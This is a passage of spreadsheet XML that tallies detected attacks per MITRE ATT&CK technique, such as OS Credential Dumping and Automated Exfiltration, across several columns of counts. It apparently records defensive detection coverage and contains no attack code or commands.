      <c r="AY3" s="322" t="str">
        <f>AX3 &amp; " (" &amp; AW3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AZ3" s="4">
        <v>0</v>
      </c>
      <c r="BA3" s="16">
        <v>0</v>
      </c>
      <c r="BB3" s="394">
        <v>0</v>
      </c>
      <c r="BC3" s="292">
        <v>6</v>
      </c>
      <c r="BD3" s="322">
        <v>3</v>
      </c>
      <c r="BE3" s="322" t="str">
        <f>BD3 &amp; " (" &amp; BC3 &amp; ")"</f>
        <v>3 (6)</v>
      </c>
      <c r="BF3" s="12">
        <v>3</v>
      </c>
      <c r="BG3" s="13">
        <v>0.5</v>
      </c>
      <c r="BH3" s="394">
        <v>1</v>
      </c>
      <c r="BI3" s="292">
        <v>1</v>
      </c>
      <c r="BJ3" s="322">
        <v>1</v>
      </c>
      <c r="BK3" s="322" t="str">
        <f>BJ3 &amp; " (" &amp; BI3 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="BL3" s="12">
        <v>1</v>
      </c>
      <c r="BM3" s="13">
        <v>0.5</v>
      </c>
      <c r="BN3" s="394">
        <v>1</v>
      </c>
      <c r="BO3" s="292">
        <v>3</v>
      </c>
      <c r="BP3" s="322">
        <v>3</v>
      </c>
      <c r="BQ3" s="322" t="str">
        <f>BP3 &amp; " (" &amp; BO3 &amp; ")"</f>
        <v>3 (3)</v>
      </c>
      <c r="BR3" s="12">
        <v>1</v>
      </c>
      <c r="BS3" s="12">
        <v>2</v>
      </c>
      <c r="BT3" s="13">
        <v>1</v>
      </c>
      <c r="BU3" s="394">
        <v>2</v>
      </c>
      <c r="BV3" s="292">
        <v>0</v>
      </c>
      <c r="BW3" s="322">
        <v>0</v>
      </c>
      <c r="BX3" s="322" t="str">
        <f>BW3 &amp; " (" &amp; BV3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BY3" s="12">
        <v>0</v>
      </c>
      <c r="BZ3" s="13">
        <v>0</v>
      </c>
      <c r="CA3" s="394">
        <v>0</v>
      </c>
      <c r="CB3" s="292">
        <v>3</v>
      </c>
      <c r="CC3" s="322">
        <v>2</v>
      </c>
      <c r="CD3" s="322" t="str">
        <f>CC3 &amp; " (" &amp; CB3 &amp; ")"</f>
        <v>2 (3)</v>
      </c>
      <c r="CE3" s="12">
        <v>0</v>
      </c>
      <c r="CF3" s="12">
        <v>2</v>
      </c>
      <c r="CG3" s="13">
        <v>1</v>
      </c>
      <c r="CH3" s="394">
        <v>2</v>
      </c>
      <c r="CM3" s="9"/>
      <c r="CN3" s="9"/>
      <c r="CO3" s="9"/>
    </row>
    <row r="4" spans="1:93" ht="15" customHeight="1">
      <c r="A4" s="4">
        <f>A3+1</f>
        <v>2</v>
      </c>
      <c r="B4" s="4" t="str">
        <f>IFERROR(VLOOKUP(A4,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1003</v>
      </c>
      <c r="C4" s="493" t="str">
        <f>IFERROR(VLOOKUP(B4,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>OS Credential Dumping</v>
      </c>
      <c r="D4" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B4)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E4" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F4" s="579" t="str">
        <f>D4&amp;" ("&amp;E4&amp;")"</f>
        <v>1 (3)</v>
      </c>
      <c r="G4" s="292">
        <v>0</v>
      </c>
      <c r="H4" s="322">
        <v>0</v>
      </c>
      <c r="I4" s="322" t="str">
        <f t="shared" ref="I4:I67" si="0">H4 &amp; " (" &amp; G4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="J4" s="12">
        <v>0</v>
      </c>
      <c r="K4" s="13">
        <v>0</v>
      </c>
      <c r="L4" s="394">
        <v>0</v>
      </c>
      <c r="M4" s="322">
        <v>0</v>
      </c>
      <c r="N4" s="322">
        <v>0</v>
      </c>
      <c r="O4" s="322" t="str">
        <f t="shared" ref="O4:O67" si="1">N4 &amp; " (" &amp; M4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="P4" s="12">
        <v>0</v>
      </c>
      <c r="Q4" s="13">
        <v>0</v>
      </c>
      <c r="R4" s="394">
        <v>0</v>
      </c>
      <c r="S4" s="292">
        <v>0</v>
      </c>
      <c r="T4" s="322">
        <v>0</v>
      </c>
      <c r="U4" s="322" t="str">
        <f t="shared" ref="U4:U67" si="2">T4 &amp; " (" &amp; S4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="V4" s="12">
        <v>0</v>
      </c>
      <c r="W4" s="13">
        <v>0</v>
      </c>
      <c r="X4" s="394">
        <v>0</v>
      </c>
      <c r="Y4" s="392">
        <v>1</v>
      </c>
      <c r="Z4" s="392">
        <v>1</v>
      </c>
      <c r="AA4" s="322" t="str">
        <f t="shared" ref="AA4:AA67" si="3">Z4 &amp; " (" &amp; Y4 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="AB4" s="392">
        <v>1</v>
      </c>
      <c r="AC4" s="16">
        <v>1</v>
      </c>
      <c r="AD4" s="394">
        <v>1</v>
      </c>
      <c r="AE4" s="392">
        <v>4</v>
      </c>
      <c r="AF4" s="392">
        <v>2</v>
      </c>
      <c r="AG4" s="322" t="str">
        <f t="shared" ref="AG4:AG67" si="4">AF4 &amp; " (" &amp; AE4 &amp; ")"</f>
        <v>2 (4)</v>
      </c>
      <c r="AH4" s="392">
        <v>2</v>
      </c>
      <c r="AI4" s="16">
        <v>1</v>
      </c>
      <c r="AJ4" s="394">
        <v>1</v>
      </c>
      <c r="AK4" s="392">
        <v>5</v>
      </c>
      <c r="AL4" s="392">
        <v>3</v>
      </c>
      <c r="AM4" s="322" t="str">
        <f t="shared" ref="AM4:AM67" si="5">AL4 &amp; " (" &amp; AK4 &amp; ")"</f>
        <v>3 (5)</v>
      </c>
      <c r="AN4" s="392">
        <v>3</v>
      </c>
      <c r="AO4" s="16">
        <v>1</v>
      </c>
      <c r="AP4" s="394">
        <v>2</v>
      </c>
      <c r="AQ4" s="292">
        <v>0</v>
      </c>
      <c r="AR4" s="322">
        <v>0</v>
      </c>
      <c r="AS4" s="322" t="str">
        <f t="shared" ref="AS4:AS67" si="6">AR4 &amp; " (" &amp; AQ4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AT4" s="12">
        <v>0</v>
      </c>
      <c r="AU4" s="13">
        <v>0</v>
      </c>
      <c r="AV4" s="394">
        <v>0</v>
      </c>
      <c r="AW4" s="392">
        <v>0</v>
      </c>
      <c r="AX4" s="392">
        <v>0</v>
      </c>
      <c r="AY4" s="322" t="str">
        <f t="shared" ref="AY4:AY67" si="7">AX4 &amp; " (" &amp; AW4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AZ4" s="4">
        <v>0</v>
      </c>
      <c r="BA4" s="16">
        <v>0</v>
      </c>
      <c r="BB4" s="394">
        <v>0</v>
      </c>
      <c r="BC4" s="292">
        <v>0</v>
      </c>
      <c r="BD4" s="322">
        <v>0</v>
      </c>
      <c r="BE4" s="322" t="str">
        <f t="shared" ref="BE4:BE67" si="8">BD4 &amp; " (" &amp; BC4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BF4" s="12">
        <v>0</v>
      </c>
      <c r="BG4" s="13">
        <v>0</v>
      </c>
      <c r="BH4" s="394">
        <v>0</v>
      </c>
      <c r="BI4" s="292">
        <v>0</v>
      </c>
      <c r="BJ4" s="322">
        <v>0</v>
      </c>
      <c r="BK4" s="322" t="str">
        <f t="shared" ref="BK4:BK67" si="9">BJ4 &amp; " (" &amp; BI4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BL4" s="12">
        <v>0</v>
      </c>
      <c r="BM4" s="13">
        <v>0</v>
      </c>
      <c r="BN4" s="394">
        <v>0</v>
      </c>
      <c r="BO4" s="292">
        <v>3</v>
      </c>
      <c r="BP4" s="322">
        <v>3</v>
      </c>
      <c r="BQ4" s="322" t="str">
        <f t="shared" ref="BQ4:BQ67" si="10">BP4 &amp; " (" &amp; BO4 &amp; ")"</f>
        <v>3 (3)</v>
      </c>
      <c r="BR4" s="12">
        <v>0</v>
      </c>
      <c r="BS4" s="12">
        <v>3</v>
      </c>
      <c r="BT4" s="13">
        <v>1</v>
      </c>
      <c r="BU4" s="394">
        <v>3</v>
      </c>
      <c r="BV4" s="292">
        <v>0</v>
      </c>
      <c r="BW4" s="322">
        <v>0</v>
      </c>
      <c r="BX4" s="322" t="str">
        <f t="shared" ref="BX4:BX67" si="11">BW4 &amp; " (" &amp; BV4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BY4" s="12">
        <v>0</v>
      </c>
      <c r="BZ4" s="13">
        <v>0</v>
      </c>
      <c r="CA4" s="394">
        <v>0</v>
      </c>
      <c r="CB4" s="292">
        <v>0</v>
      </c>
      <c r="CC4" s="322">
        <v>0</v>
      </c>
      <c r="CD4" s="322" t="str">
        <f t="shared" ref="CD4:CD67" si="12">CC4 &amp; " (" &amp; CB4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="CE4" s="12">
        <v>0</v>
      </c>
      <c r="CF4" s="12">
        <v>0</v>
      </c>
      <c r="CG4" s="13">
        <v>0</v>
      </c>
      <c r="CH4" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:93" ht="15" customHeight="1">
      <c r="A5" s="4">
        <f t="shared" ref="A5:A68" si="13">A4+1</f>
        <v>3</v>
      </c>
      <c r="B5" s="4" t="str">
        <f>IFERROR(VLOOKUP(A5,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1008</v>
      </c>
      <c r="C5" s="493" t="str">
        <f>IFERROR(VLOOKUP(B5,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Fallback Channels</v>
      </c>
      <c r="D5" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B5)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E5" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>6</v>
      </c>
      <c r="F5" s="579" t="str">
        <f t="shared" ref="F5:F68" si="14">D5&amp;" ("&amp;E5&amp;")"</f>
        <v>1 (6)</v>
      </c>
      <c r="G5" s="292">
        <v>15</v>
      </c>
      <c r="H5" s="322">
        <v>1</v>
      </c>
      <c r="I5" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (15)</v>
      </c>
      <c r="J5" s="12">
        <v>1</v>
      </c>
      <c r="K5" s="13">
        <v>1</v>
      </c>
      <c r="L5" s="394">
        <v>1</v>
      </c>
      <c r="M5" s="322">
        <v>17</v>
      </c>
      <c r="N5" s="322">
        <v>7</v>
      </c>
      <c r="O5" s="322" t="str">
        <f t="shared" si="1"/>
        <v>7 (17)</v>
      </c>
      <c r="P5" s="12">
        <v>4</v>
      </c>
      <c r="Q5" s="13">
        <v>1</v>
      </c>
      <c r="R5" s="394">
        <v>3</v>
      </c>
      <c r="S5" s="292">
        <v>32</v>
      </c>
      <c r="T5" s="322">
        <v>8</v>
      </c>
      <c r="U5" s="322" t="str">
        <f t="shared" si="2"/>
        <v>8 (32)</v>
      </c>
      <c r="V5" s="12">
        <v>5</v>
      </c>
      <c r="W5" s="13">
        <v>1</v>
      </c>
      <c r="X5" s="394">
        <v>3</v>
      </c>
      <c r="Y5" s="392">
        <v>99</v>
      </c>
      <c r="Z5" s="392">
        <v>4</v>
      </c>
      <c r="AA5" s="322" t="str">
        <f t="shared" si="3"/>
        <v>4 (99)</v>
      </c>
      <c r="AB5" s="392">
        <v>3</v>
      </c>
      <c r="AC5" s="16">
        <v>1</v>
      </c>
      <c r="AD5" s="394">
        <v>3</v>
      </c>
      <c r="AE5" s="392">
        <v>42</v>
      </c>
      <c r="AF5" s="392">
        <v>13</v>
      </c>
      <c r="AG5" s="322" t="str">
        <f t="shared" si="4"/>
        <v>13 (42)</v>
      </c>
      <c r="AH5" s="392">
        <v>7</v>
      </c>
      <c r="AI5" s="16">
        <v>1</v>
      </c>
      <c r="AJ5" s="394">
        <v>5</v>
      </c>
      <c r="AK5" s="392">
        <v>141</v>
      </c>
      <c r="AL5" s="392">
        <v>17</v>
      </c>
      <c r="AM5" s="322" t="str">
        <f t="shared" si="5"/>
        <v>17 (141)</v>
      </c>
      <c r="AN5" s="392">
        <v>10</v>
      </c>
      <c r="AO5" s="16">
        <v>1</v>
      </c>
      <c r="AP5" s="394">
        <v>5</v>
      </c>
      <c r="AQ5" s="292">
        <v>0</v>
      </c>
      <c r="AR5" s="322">
        <v>0</v>
      </c>
      <c r="AS5" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT5" s="12">
        <v>0</v>
      </c>
      <c r="AU5" s="13">
        <v>0</v>
      </c>
      <c r="AV5" s="394">
        <v>0</v>
      </c>
      <c r="AW5" s="392">
        <v>0</v>
      </c>
      <c r="AX5" s="392">
        <v>0</v>
      </c>
      <c r="AY5" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ5" s="4">
        <v>0</v>
      </c>
      <c r="BA5" s="16">
        <v>0</v>
      </c>
      <c r="BB5" s="394">
        <v>0</v>
      </c>
      <c r="BC5" s="292">
        <v>32</v>
      </c>
      <c r="BD5" s="322">
        <v>8</v>
      </c>
      <c r="BE5" s="322" t="str">
        <f t="shared" si="8"/>
        <v>8 (32)</v>
      </c>
      <c r="BF5" s="12">
        <v>5</v>
      </c>
      <c r="BG5" s="13">
        <v>1</v>
      </c>
      <c r="BH5" s="394">
        <v>3</v>
      </c>
      <c r="BI5" s="292">
        <v>4</v>
      </c>
      <c r="BJ5" s="322">
        <v>2</v>
      </c>
      <c r="BK5" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (4)</v>
      </c>
      <c r="BL5" s="12">
        <v>1</v>
      </c>
      <c r="BM5" s="13">
        <v>1</v>
      </c>
      <c r="BN5" s="394">
        <v>2</v>
      </c>
      <c r="BO5" s="292">
        <v>11</v>
      </c>
      <c r="BP5" s="322">
        <v>9</v>
      </c>
      <c r="BQ5" s="322" t="str">
        <f t="shared" si="10"/>
        <v>9 (11)</v>
      </c>
      <c r="BR5" s="12">
        <v>1</v>
      </c>
      <c r="BS5" s="12">
        <v>5</v>
      </c>
      <c r="BT5" s="13">
        <v>1</v>
      </c>
      <c r="BU5" s="394">
        <v>5</v>
      </c>
      <c r="BV5" s="292">
        <v>2</v>
      </c>
      <c r="BW5" s="322">
        <v>2</v>
      </c>
      <c r="BX5" s="322" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY5" s="12">
        <v>1</v>
      </c>
      <c r="BZ5" s="13">
        <v>1</v>
      </c>
      <c r="CA5" s="394">
        <v>2</v>
      </c>
      <c r="CB5" s="292">
        <v>11</v>
      </c>
      <c r="CC5" s="322">
        <v>3</v>
      </c>
      <c r="CD5" s="322" t="str">
        <f t="shared" si="12"/>
        <v>3 (11)</v>
      </c>
      <c r="CE5" s="12">
        <v>0</v>
      </c>
      <c r="CF5" s="12">
        <v>2</v>
      </c>
      <c r="CG5" s="13">
        <v>1</v>
      </c>
      <c r="CH5" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:93" ht="15" customHeight="1">
      <c r="A6" s="4">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="B6" s="4" t="str">
        <f>IFERROR(VLOOKUP(A6,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1011</v>
      </c>
      <c r="C6" s="493" t="str">
        <f>IFERROR(VLOOKUP(B6,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
      <c r="D6" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B6)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E6" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F6" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G6" s="292">
        <v>0</v>
      </c>
      <c r="H6" s="322">
        <v>0</v>
      </c>
      <c r="I6" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J6" s="12">
        <v>0</v>
      </c>
      <c r="K6" s="13">
        <v>0</v>
      </c>
      <c r="L6" s="394">
        <v>0</v>
      </c>
      <c r="M6" s="322">
        <v>0</v>
      </c>
      <c r="N6" s="322">
        <v>0</v>
      </c>
      <c r="O6" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P6" s="12">
        <v>0</v>
      </c>
      <c r="Q6" s="13">
        <v>0</v>
      </c>
      <c r="R6" s="394">
        <v>0</v>
      </c>
      <c r="S6" s="292">
        <v>0</v>
      </c>
      <c r="T6" s="322">
        <v>0</v>
      </c>
      <c r="U6" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V6" s="12">
        <v>0</v>
      </c>
      <c r="W6" s="13">
        <v>0</v>
      </c>
      <c r="X6" s="394">
        <v>0</v>
      </c>
      <c r="Y6" s="392">
        <v>0</v>
      </c>
      <c r="Z6" s="392">
        <v>0</v>
      </c>
      <c r="AA6" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB6" s="392">
        <v>0</v>
      </c>
      <c r="AC6" s="16">
        <v>0</v>
      </c>
      <c r="AD6" s="394">
        <v>0</v>
      </c>
      <c r="AE6" s="392">
        <v>4</v>
      </c>
      <c r="AF6" s="392">
        <v>2</v>
      </c>
      <c r="AG6" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH6" s="392">
        <v>2</v>
      </c>
      <c r="AI6" s="16">
        <v>1</v>
      </c>
      <c r="AJ6" s="394">
        <v>1</v>
      </c>
      <c r="AK6" s="392">
        <v>4</v>
      </c>
      <c r="AL6" s="392">
        <v>2</v>
      </c>
      <c r="AM6" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2 (4)</v>
      </c>
      <c r="AN6" s="392">
        <v>2</v>
      </c>
      <c r="AO6" s="16">
        <v>1</v>
      </c>
      <c r="AP6" s="394">
        <v>1</v>
      </c>
      <c r="AQ6" s="292">
        <v>0</v>
      </c>
      <c r="AR6" s="322">
        <v>0</v>
      </c>
      <c r="AS6" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT6" s="12">
        <v>0</v>
      </c>
      <c r="AU6" s="13">
        <v>0</v>
      </c>
      <c r="AV6" s="394">
        <v>0</v>
      </c>
      <c r="AW6" s="392">
        <v>0</v>
      </c>
      <c r="AX6" s="392">
        <v>0</v>
      </c>
      <c r="AY6" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ6" s="4">
        <v>0</v>
      </c>
      <c r="BA6" s="16">
        <v>0</v>
      </c>
      <c r="BB6" s="394">
        <v>0</v>
      </c>
      <c r="BC6" s="292">
        <v>0</v>
      </c>
      <c r="BD6" s="322">
        <v>0</v>
      </c>
      <c r="BE6" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF6" s="12">
        <v>0</v>
      </c>
      <c r="BG6" s="13">
        <v>0</v>
      </c>
      <c r="BH6" s="394">
        <v>0</v>
      </c>
      <c r="BI6" s="292">
        <v>0</v>
      </c>
      <c r="BJ6" s="322">
        <v>0</v>
      </c>
      <c r="BK6" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL6" s="12">
        <v>0</v>
      </c>
      <c r="BM6" s="13">
        <v>0</v>
      </c>
      <c r="BN6" s="394">
        <v>0</v>
      </c>
      <c r="BO6" s="292">
        <v>0</v>
      </c>
      <c r="BP6" s="322">
        <v>0</v>
      </c>
      <c r="BQ6" s="322" t="str">
        <f t="shared" si="10"/>
        <v>0 (0)</v>
      </c>
      <c r="BR6" s="12">
        <v>0</v>
      </c>
      <c r="BS6" s="12">
        <v>0</v>
      </c>
      <c r="BT6" s="13">
        <v>0</v>
      </c>
      <c r="BU6" s="394">
        <v>0</v>
      </c>
      <c r="BV6" s="292">
        <v>0</v>
      </c>
      <c r="BW6" s="322">
        <v>0</v>
      </c>
      <c r="BX6" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY6" s="12">
        <v>0</v>
      </c>
      <c r="BZ6" s="13">
        <v>0</v>
      </c>
      <c r="CA6" s="394">
        <v>0</v>
      </c>
      <c r="CB6" s="292">
        <v>0</v>
      </c>
      <c r="CC6" s="322">
        <v>0</v>
      </c>
      <c r="CD6" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE6" s="12">
        <v>0</v>
      </c>
      <c r="CF6" s="12">
        <v>0</v>
      </c>
      <c r="CG6" s="13">
        <v>0</v>
      </c>
      <c r="CH6" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:93" ht="15" customHeight="1">
      <c r="A7" s="4">
        <f t="shared" si="13"/>
        <v>5</v>
      </c>
      <c r="B7" s="4" t="str">
        <f>IFERROR(VLOOKUP(A7,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1018</v>
      </c>
      <c r="C7" s="493" t="str">
        <f>IFERROR(VLOOKUP(B7,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="D7" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B7)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E7" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1002</v>
      </c>
      <c r="F7" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1002)</v>
      </c>
      <c r="G7" s="292">
        <v>0</v>
      </c>
      <c r="H7" s="322">
        <v>0</v>
      </c>
      <c r="I7" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J7" s="12">
        <v>0</v>
      </c>
      <c r="K7" s="13">
        <v>0</v>
      </c>
      <c r="L7" s="394">
        <v>0</v>
      </c>
      <c r="M7" s="322">
        <v>6</v>
      </c>
      <c r="N7" s="322">
        <v>6</v>
      </c>
      <c r="O7" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (6)</v>
      </c>
      <c r="P7" s="12">
        <v>6</v>
      </c>
      <c r="Q7" s="13">
        <v>1</v>
      </c>
      <c r="R7" s="394">
        <v>6</v>
      </c>
      <c r="S7" s="292">
        <v>6</v>
      </c>
      <c r="T7" s="322">
        <v>6</v>
      </c>
      <c r="U7" s="322" t="str">
        <f t="shared" si="2"/>
        <v>6 (6)</v>
      </c>
      <c r="V7" s="12">
        <v>6</v>
      </c>
      <c r="W7" s="13">
        <v>1</v>
      </c>
      <c r="X7" s="394">
        <v>6</v>
      </c>
      <c r="Y7" s="392">
        <v>2</v>
      </c>
      <c r="Z7" s="392">
        <v>2</v>
      </c>
      <c r="AA7" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (2)</v>
      </c>
      <c r="AB7" s="392">
        <v>2</v>
      </c>
      <c r="AC7" s="16">
        <v>1</v>
      </c>
      <c r="AD7" s="394">
        <v>2</v>
      </c>
      <c r="AE7" s="392">
        <v>11</v>
      </c>
      <c r="AF7" s="392">
        <v>9</v>
      </c>
      <c r="AG7" s="322" t="str">
        <f t="shared" si="4"/>
        <v>9 (11)</v>
      </c>
      <c r="AH7" s="392">
        <v>9</v>
      </c>
      <c r="AI7" s="16">
        <v>1</v>
      </c>
      <c r="AJ7" s="394">
        <v>8</v>
      </c>
      <c r="AK7" s="392">
        <v>13</v>
      </c>
      <c r="AL7" s="392">
        <v>11</v>
      </c>
      <c r="AM7" s="322" t="str">
        <f t="shared" si="5"/>
        <v>11 (13)</v>
      </c>
      <c r="AN7" s="392">
        <v>11</v>
      </c>
      <c r="AO7" s="16">
        <v>1</v>
      </c>
      <c r="AP7" s="394">
        <v>9</v>
      </c>
      <c r="AQ7" s="292">
        <v>0</v>
      </c>
      <c r="AR7" s="322">
        <v>0</v>
      </c>
      <c r="AS7" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT7" s="12">
        <v>0</v>
      </c>
      <c r="AU7" s="13">
        <v>0</v>
      </c>
      <c r="AV7" s="394">
        <v>0</v>
      </c>
      <c r="AW7" s="392">
        <v>2</v>
      </c>
      <c r="AX7" s="392">
        <v>2</v>
      </c>
      <c r="AY7" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (2)</v>
      </c>
      <c r="AZ7" s="4">
        <v>2</v>
      </c>
      <c r="BA7" s="16">
        <v>1</v>
      </c>
      <c r="BB7" s="394">
        <v>2</v>
      </c>
      <c r="BC7" s="292">
        <v>8</v>
      </c>
      <c r="BD7" s="322">
        <v>8</v>
      </c>
      <c r="BE7" s="322" t="str">
        <f t="shared" si="8"/>
        <v>8 (8)</v>
      </c>
      <c r="BF7" s="12">
        <v>8</v>
      </c>
      <c r="BG7" s="13">
        <v>1</v>
      </c>
      <c r="BH7" s="394">
        <v>8</v>
      </c>
      <c r="BI7" s="292">
        <v>0</v>
      </c>
      <c r="BJ7" s="322">
        <v>0</v>
      </c>
      <c r="BK7" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL7" s="12">
        <v>0</v>
      </c>
      <c r="BM7" s="13">
        <v>0</v>
      </c>
      <c r="BN7" s="394">
        <v>0</v>
      </c>
      <c r="BO7" s="292">
        <v>0</v>
      </c>
      <c r="BP7" s="322">
        <v>0</v>
      </c>
      <c r="BQ7" s="322" t="str">
        <f t="shared" si="10"/>
        <v>0 (0)</v>
      </c>
      <c r="BR7" s="12">
        <v>0</v>
      </c>
      <c r="BS7" s="12">
        <v>0</v>
      </c>
      <c r="BT7" s="13">
        <v>0</v>
      </c>
      <c r="BU7" s="394">
        <v>0</v>
      </c>
      <c r="BV7" s="292">
        <v>0</v>
      </c>
      <c r="BW7" s="322">
        <v>0</v>
      </c>
      <c r="BX7" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY7" s="12">
        <v>0</v>
      </c>
      <c r="BZ7" s="13">
        <v>0</v>
      </c>
      <c r="CA7" s="394">
        <v>0</v>
      </c>
      <c r="CB7" s="292">
        <v>0</v>
      </c>
      <c r="CC7" s="322">
        <v>0</v>
      </c>
      <c r="CD7" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE7" s="12">
        <v>0</v>
      </c>
      <c r="CF7" s="12">
        <v>0</v>
      </c>
      <c r="CG7" s="13">
        <v>0</v>
      </c>
      <c r="CH7" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:93" ht="15" customHeight="1">
      <c r="A8" s="4">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="B8" s="4" t="str">
        <f>IFERROR(VLOOKUP(A8,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1020</v>
      </c>
      <c r="C8" s="493" t="str">
        <f>IFERROR(VLOOKUP(B8,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Automated Exfiltration</v>
      </c>
      <c r="D8" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B8)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E8" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>26</v>
      </c>
      <c r="F8" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (26)</v>
      </c>
      <c r="G8" s="292">
        <v>11</v>
      </c>
      <c r="H8" s="322">
        <v>2</v>
      </c>
      <c r="I8" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (11)</v>
      </c>
      <c r="J8" s="12">
        <v>1</v>
      </c>
      <c r="K8" s="13">
        <v>1</v>
      </c>
      <c r="L8" s="394">
        <v>2</v>
      </c>
      <c r="M8" s="322">
        <v>0</v>
      </c>
      <c r="N8" s="322">
        <v>0</v>
      </c>
      <c r="O8" s="322" t="str">
        <f t="shared" si="1"/>
